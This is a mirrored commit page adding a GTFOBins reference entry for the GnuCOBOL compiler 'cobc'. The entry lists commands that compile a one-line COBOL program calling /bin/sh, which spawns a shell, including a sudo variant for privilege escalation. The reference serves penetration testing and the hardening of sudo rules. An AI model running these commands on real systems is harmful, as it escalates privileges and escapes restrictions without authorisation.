mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 16:58:36 +01:00 
			
		
		
		
	Create cobc.md
This commit is contained in:
		
							
								
								
									
										13
									
								
								_gtfobins/cobc.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										13
									
								
								_gtfobins/cobc.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,13 @@ | ||||
| --- | ||||
| functions: | ||||
|   shell: | ||||
|     - code: | | ||||
|         TF=$(mktemp -d) | ||||
|         echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x | ||||
|         cobc -xFj --frelax-syntax-checks $TF/x | ||||
|   sudo: | ||||
|     - code: | | ||||
|         TF=$(mktemp -d) | ||||
|         echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x | ||||
|         sudo cobc -xFj --frelax-syntax-checks $TF/x | ||||
| --- | ||||
		Reference in New Issue
	
	Block a user